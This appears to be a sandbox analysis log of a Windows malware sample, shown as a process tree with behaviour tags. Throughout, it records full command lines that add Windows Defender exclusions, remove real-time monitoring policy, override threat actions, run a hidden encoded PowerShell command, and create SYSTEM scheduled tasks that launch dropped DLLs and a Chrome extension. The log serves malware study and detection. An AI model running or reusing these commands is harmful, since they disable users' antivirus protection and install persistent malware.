C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:323⤵PID:2696
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1008 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:323⤵PID:1692
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:324⤵PID:1656
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2504 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf"3⤵
- System Location Discovery: System Language Discovery
PID:1592
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\ErKIoDgHiflivqkZ\CYsQOwTc\uRthnpKRNaMTwjKB.wsf"3⤵
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2560 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:324⤵PID:2684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BnSeAqsvAhUdC" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:1980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MivewcCGXeCU2" /t REG_DWORD /d 0 /reg:644⤵PID:2556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:324⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TusZhOGSSwUn" /t REG_DWORD /d 0 /reg:644⤵PID:2460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:324⤵PID:2752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR" /t REG_DWORD /d 0 /reg:644⤵PID:2816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:324⤵PID:996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rksWaXujU" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:2196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:324⤵PID:2876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BiTaXhratCGNPnVB" /t REG_DWORD /d 0 /reg:644⤵PID:2492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:3020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\olrZuEJhuzUWbFuCi" /t REG_DWORD /d 0 /reg:644⤵
- System Location Discovery: System Language Discovery
PID:1524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:2912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ErKIoDgHiflivqkZ" /t REG_DWORD /d 0 /reg:644⤵PID:2688
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbfUGSHgt" /SC once /ST 03:04:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:3024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbfUGSHgt"3⤵PID:2788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbfUGSHgt"3⤵
- System Location Discovery: System Language Discovery
PID:1692
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2076
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
- System Location Discovery: System Language Discovery
PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2128 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1728
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mVwrlHrSDNRLOGqZG" /SC once /ST 03:13:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe\" uL /NafCdidyF 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mVwrlHrSDNRLOGqZG"3⤵
- System Location Discovery: System Language Discovery
PID:2580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 6283⤵
- Loads dropped DLL
- Program crash
PID:1148
-
-
-
C:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exeC:\Windows\Temp\ErKIoDgHiflivqkZ\WnSrIDIgFqFuSvw\gLYDEcB.exe uL /NafCdidyF 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:612 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1764
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:1560 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:1596 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:1792
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:804 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:908 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:604
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:2996 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1948
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1788
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:684 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2516
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:2384
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Indirect Command Execution
PID:2256 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2140
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1068
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWNXgrRlacKgnUwPKK"3⤵PID:932
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:1616
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
- Indirect Command Execution
PID:2748 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- System Location Discovery: System Language Discovery
PID:1156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:848 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
- System Location Discovery: System Language Discovery
PID:2244 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\rksWaXujU\EFzTpY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "AlVsOicJKGYGSUS" /V1 /F3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2188
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AlVsOicJKGYGSUS2" /F /xml "C:\Program Files (x86)\rksWaXujU\dgpWayZ.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2672
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "AlVsOicJKGYGSUS"3⤵PID:1780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "AlVsOicJKGYGSUS"3⤵
- System Location Discovery: System Language Discovery
PID:1784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HqaqbRPcNxJZrD" /F /xml "C:\Program Files (x86)\MivewcCGXeCU2\pfpSGyE.xml" /RU "SYSTEM"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KtgLbJTNbqQVX2" /F /xml "C:\ProgramData\BiTaXhratCGNPnVB\OqlCPyB.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CaeXOOsQHbNfKhlUh2" /F /xml "C:\Program Files (x86)\ZIWhWpltLlQHHUslkTR\izElhPb.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eUzrIsCcCKtUEuKCBuS2" /F /xml "C:\Program Files (x86)\BnSeAqsvAhUdC\nYKHVyW.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KOXGBKFkHUHlhNtav" /SC once /ST 00:23:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll\",#1 /aNdidF 525403" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "KOXGBKFkHUHlhNtav"3⤵PID:2040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mVwrlHrSDNRLOGqZG"3⤵PID:2440
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 612 -s 15403⤵
- Loads dropped DLL
- Program crash
PID:2028
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll",#1 /aNdidF 5254032⤵PID:2288
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ErKIoDgHiflivqkZ\dCdkihji\aMTozzm.dll",#1 /aNdidF 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2704 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KOXGBKFkHUHlhNtav"4⤵PID:2668
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A9D37EFA-5736-4263-8B18-5CF7CD4EAAC9} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]1⤵PID:2356
-
